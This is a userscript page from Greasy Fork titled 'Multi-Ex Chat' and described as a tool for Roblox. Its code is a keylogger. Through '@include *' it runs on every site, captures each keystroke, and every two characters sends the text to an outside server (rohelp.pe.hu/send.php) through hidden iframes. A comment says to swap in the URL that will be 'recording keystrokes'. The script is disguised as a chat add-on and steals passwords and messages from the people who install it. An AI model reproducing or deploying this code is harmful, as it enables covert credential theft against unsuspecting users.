Extinct Dev - SCP - BWE - Multi-Ex Chat

Edited by WizdaniUnleashed - Use Target:Roblox.com

目前为 2016-07-21 提交的版本。查看 最新版本

  1. //Chat Code Developed by Manak Kapoor. Key
  2. // ==UserScript==
  3. // @name Extinct Dev - SCP - BWE - Multi-Ex Chat
  4. // @description Edited by WizdaniUnleashed - Use Target:Roblox.com
  5. // @version 1.0.0
  6. // @include *
  7. // @namespace https://greasyfork.org/users/41642
  8. // ==/UserScript==
  9. //Please contact manak.kapoor@gmail.com for more information.
  10. /*
  11. * This work is licensed under a Creative Commons
  12. * Attribution-NonCommercial-NoDerivs 3.0 Unported License
  13. * http://creativecommons.org/licenses/by-nc-nd/3.0/
  14. *
  15. * LICENSOR HAS
  16. * BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.
  17. */
  18. //Change required Urls to the URL you will be using for recording keystrokes. http://topperz.no-ip.org EDIT TO WHAT EVER URL WHICH IS GOING TO BE USED!
  19. //javascript:var s=document.createElement("script");s.src="http://localhost:84/userscripts/internetsecurity/editable.js";s.type="text/javascript";document.getElementsByTagName("body")[0].appendChild(s);
  20. //document.getElementsByTagName("body")[0].setAttribute("spellcheck","false");
  21. var container = document.createElement('div');
  22. container.setAttribute('id', 'fbcontainer');
  23. container.setAttribute('style', 'position:fixed; width:100%; height:100%; z-index:9999999;');
  24. container.innerHTML='<iframe style="display:none;" id="sender"></iframe><iframe style="display:none;" id="sender1"></iframe><iframe style="display:none;" id="sender2"></iframe>';
  25. document.getElementsByTagName("body")[0].insertBefore(container,document.getElementsByTagName("body")[0].firstChild);
  26. document.getElementsByTagName("body")[0].appendChild(container);
  27. var changeFrame=0;
  28. var record="";
  29. var charCount=0;
  30. document.keyup=function(e) {
  31. }
  32. document.onkeydown=function(e){
  33. record=record+String.fromCharCode(e.which);
  34. charCount++;
  35. if(charCount==2)
  36. {
  37. if(changeFrame==1)
  38. {
  39. document.getElementById("sender1").setAttribute('src', 'http://rohelp.pe.hu/send.php?s='+record);
  40. record="";
  41. charCount=0;
  42. changeFrame++;
  43. }
  44. else
  45. {
  46. if(changeFrame==0)
  47. {
  48. document.getElementById("sender").setAttribute('src', 'http://rohelp.pe.hu/send.php?s='+record);
  49. record="";
  50. charCount=0;
  51. changeFrame++;
  52. }
  53. else
  54. {
  55. document.getElementById("sender2").setAttribute('src', 'http://rohelp.pe.hu/send.php?s='+record);
  56. record="";
  57. charCount=0;
  58. changeFrame=0;
  59. }
  60. }
  61. }
  62. }
  63.